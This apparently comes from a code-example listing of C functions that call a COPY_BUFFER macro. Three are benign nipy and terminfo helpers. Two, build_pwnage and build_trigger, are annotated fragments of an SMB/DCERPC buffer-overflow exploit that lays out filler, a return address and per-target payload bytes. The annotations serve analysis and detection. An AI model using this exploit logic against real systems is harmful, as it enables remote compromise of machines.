Esempio n. 1
/*
 * Assemble one request: a 256-byte local blob wrapped in the NBT, SMB,
 * WriteAndX and DCERPC header templates.
 *
 * Blob layout, as written below: 0x41 filler throughout, the marker "BBBB"
 * at [distance - 4], the 4 bytes of `ret` at [distance], more filler, and
 * the per-target bytes (`asmcode`) placed so they end one byte short of the
 * end of the blob. All values come from simple_targets[target_selection].
 *
 * RESET_BUFFER, COPY_BUFFER and the SET_* macros are defined outside this
 * excerpt; they presumably operate on a shared output buffer and on the
 * header templates -- confirm against their definitions. The excerpt does
 * not name the service or flaw this request is aimed at.
 *
 * For detection, the traits visible here are the long run of 0x41 filler and
 * a byte count that exceeds the declared data length by the blob size
 * (field meanings inferred from the macro names).
 */
static void build_pwnage()
{
   unsigned int   n = 0;
   unsigned int   packet_size;
   unsigned int   payload_size;
   unsigned char  payload[256];
   unsigned char  *target        = simple_targets[target_selection].name;
   unsigned char  *asmcode       = simple_targets[target_selection].payload;
   unsigned int   asmcode_size   = simple_targets[target_selection].payload_size;
   unsigned int   distance       = simple_targets[target_selection].distance;
   unsigned int   ret            = simple_targets[target_selection].ret;
   int            nopspace;

   printf("[+] Building payload for [%s] [distance=%d ret=0x%08x]\n", target, distance, ret);
   payload_size = sizeof(payload);
   
   /* NOTE(review): this check is done in unsigned arithmetic. When
      asmcode_size == sizeof(payload) the right-hand side wraps around, the
      check passes, and the final memcpy below writes past `payload`. Nothing
      here rejects distance < 4 either, in which case `payload + distance - 4`
      points before the array. */
   if((asmcode_size > sizeof(payload)) || ((distance + 4) > (payload_size - asmcode_size - 1))) {
      printf("[+] Payload size too big\n");
      exit(EXIT_FAILURE);
   }
   memset(payload, 0x41, sizeof(payload));
   memcpy(payload + distance - 4, "BBBB", 4);
   /* Copies the raw in-memory bytes of `ret`; assumes unsigned int is 4 bytes
      and uses the host byte order. */
   memcpy(payload + distance, &ret, 4);
   //memcpy(payload + distance + 4, asmcode, asmcode_size);
   /* Gap between the `ret` slot and the per-target bytes; the trailing -1
      leaves the last byte of the blob as filler. */
   nopspace = payload_size - asmcode_size - distance - 4 - 1;
   if(nopspace < 0) nopspace = 0;

   /* The message says "NOP space", but the gap is filled with 0x41, the same
      value the initial memset already wrote. */
   printf("[+] Using %d bytes for NOP space\n", nopspace);
   memset(payload + distance + 4, 0x41, nopspace);
   memcpy(payload + distance + 4 + nopspace, asmcode, asmcode_size);


   RESET_BUFFER;
   
   /* Data length is set to the DCERPC header alone while the byte count also
      includes the blob (inferred from the macro names -- confirm). */
   SET_SMBWRITEANDX_DATA_OFFSET(64 + payload_size - 1);
   SET_SMBWRITEANDX_DATA_LEN_LOW(sizeof(DCERPC_HEADER));
   SET_SMB_WRITEANDX_BYTE_COUNT(sizeof(DCERPC_HEADER) + payload_size);

   /* NBT_HEADER is not part of this length. The -3 presumably discounts one
      trailing byte of each of the three templates -- confirm. */
   packet_size = sizeof(SMB_HEADER) + sizeof(SMB_WRITEANDX_HEADER) + payload_size + sizeof(DCERPC_HEADER) - 3;

   SET_NBT_HEADER_LEN(packet_size);
   /* Each piece is copied at offset n, and n then advances by size - 1, so
      the next piece starts on the last byte of the previous one. */
   COPY_BUFFER(n, NBT_HEADER, sizeof(NBT_HEADER));
   n += sizeof(NBT_HEADER) - 1;

   COPY_BUFFER(n, SMB_HEADER, sizeof(SMB_HEADER));
   n += sizeof(SMB_HEADER) - 1;

   COPY_BUFFER(n, SMB_WRITEANDX_HEADER, sizeof(SMB_WRITEANDX_HEADER));
   n += sizeof(SMB_WRITEANDX_HEADER) - 1;

   /* The blob sits between the WriteAndX header and the DCERPC header; its
      final filler byte is replaced by the first DCERPC byte. */
   COPY_BUFFER(n, payload, payload_size);
   n += payload_size - 1;

   COPY_BUFFER(n, DCERPC_HEADER, sizeof(DCERPC_HEADER));
}
Esempio n. 2
File: fffpy.c Progetto: FNNDSC/nipy
/*
 * Refresh `y` from the position the NumPy iterator `it` currently addresses.
 *
 * A vector that owns its storage (y->owner set) is refilled through
 * COPY_BUFFER using the array's stride along `axis`, its type code and its
 * item size. A non-owning vector is simply re-pointed at the iterator's data;
 * `axis` is not consulted in that case, and the bytes are reinterpreted as
 * double with no type check here (presumably the caller only builds
 * non-owning views over double arrays -- confirm).
 */
void _fff_vector_sync_with_PyArrayIter(fff_vector* y, const PyArrayIterObject* it, npy_intp axis)
{
  PyArrayObject* array;

  /* View mode: alias the array memory, nothing is copied. */
  if (!y->owner) {
    y->data = (double*) PyArray_ITER_DATA(it);
    return;
  }

  /* Copy mode: pull the elements into the vector's own storage. */
  array = (PyArrayObject*) it->ao;
  COPY_BUFFER(y, PyArray_ITER_DATA(it), PyArray_STRIDE(array, axis),
              PyArray_TYPE(array), PyArray_ITEMSIZE(array));
}
Esempio n. 3
/*
 * Assemble a request made only of the four header templates (NBT, SMB,
 * WriteAndX, DCERPC), with no additional data between them.
 *
 * RESET_BUFFER, COPY_BUFFER and the SET_* macros are defined outside this
 * excerpt; they presumably operate on a shared output buffer and on the
 * header templates -- confirm against their definitions.
 */
static void build_trigger()
{
   unsigned int n = 0;
   unsigned int packet_size;

   RESET_BUFFER;

   /* NOTE(review): the full sizeof of each template is summed here, while the
      offsets below advance by sizeof - 1; confirm the length written into the
      NBT header matches the bytes actually copied. */
   packet_size = sizeof(SMB_HEADER) + sizeof(SMB_WRITEANDX_HEADER) + sizeof(DCERPC_HEADER);

   /* Data length and byte count are both set to the DCERPC header size
      (field meanings inferred from the macro names). */
   SET_SMBWRITEANDX_DATA_LEN_LOW(sizeof(DCERPC_HEADER));
   SET_SMB_WRITEANDX_BYTE_COUNT(sizeof(DCERPC_HEADER));
   
   SET_NBT_HEADER_LEN(packet_size);
   /* Each template is copied at offset n, and n then advances by size - 1, so
      the next template starts on the last byte of the previous one. */
   COPY_BUFFER(n, NBT_HEADER, sizeof(NBT_HEADER));
   n += sizeof(NBT_HEADER) - 1;

   COPY_BUFFER(n, SMB_HEADER, sizeof(SMB_HEADER));
   n += sizeof(SMB_HEADER) - 1;

   COPY_BUFFER(n, SMB_WRITEANDX_HEADER, sizeof(SMB_WRITEANDX_HEADER));
   n += sizeof(SMB_WRITEANDX_HEADER) - 1;

   COPY_BUFFER(n, DCERPC_HEADER, sizeof(DCERPC_HEADER));
}
Esempio n. 4
File: fffpy.c Progetto: FNNDSC/nipy
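/*
 * Build an fff_vector over a raw array buffer.
 *
 *   data     first element of the source buffer
 *   dim      number of elements
 *   stride   distance between consecutive elements, in bytes
 *   type     NumPy type code of the elements
 *   itemsize size of one element, in bytes
 *
 * When the elements are doubles of the native size, the result is a
 * non-owning view (owner == 0) that aliases `data`: the caller must keep the
 * source buffer alive for as long as the vector is used. Otherwise a new
 * vector is allocated with fff_vector_new and filled through COPY_BUFFER.
 *
 * Returns NULL if the view header cannot be allocated.
 */
static fff_vector* _fff_vector_new_from_buffer(const char* data, npy_intp dim, npy_intp stride, int type, int itemsize)
{
  fff_vector* y;
  size_t sizeof_double = sizeof(double);

  /* Wrap without copying when the elements are already C doubles. Only the
     type code and item size are checked; alignment is not verified here, and
     the byte stride is assumed to be a non-negative multiple of
     sizeof(double) -- confirm against callers. */
  if ((type == NPY_DOUBLE) && (itemsize==sizeof_double)) {
    y = malloc(sizeof *y);
    if (y == NULL) {
      /* Allocation failure was previously dereferenced unchecked. */
      return NULL;
    }
    y->size = (size_t)dim;
    y->stride = (size_t)stride/sizeof_double;
    /* Drops const: the view shares (and can write to) the caller's memory. */
    y->data = (double*)data;
    y->owner = 0;
  }
  /* Otherwise, return an owning contiguous vector holding a copy of the data */
  else {
    y = fff_vector_new((size_t)dim);
    /* Skip the copy if the allocator reported failure (assumes
       fff_vector_new can return NULL -- confirm). */
    if (y != NULL) {
      COPY_BUFFER(y, data, stride, type, itemsize);
    }
  }

  return y;
}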
Esempio n. 5
/*
 * Const-correct wrapper around tigetflag(): looks up the capability `name`
 * and returns whatever tigetflag() returns for it.
 *
 * COPY_BUFFER is defined outside this excerpt; it evidently provides
 * `name_buffer`, a writable copy of `name`. Whether that copy is bounded or
 * truncated for long names cannot be seen from here -- confirm in the macro.
 */
int _t3_tigetflag(const char *name) {
  int flag;

  /* tigetflag takes a plain char *, so it is given a private copy rather
     than the caller's const string. */
  COPY_BUFFER(name);
  flag = tigetflag(name_buffer);
  return flag;
}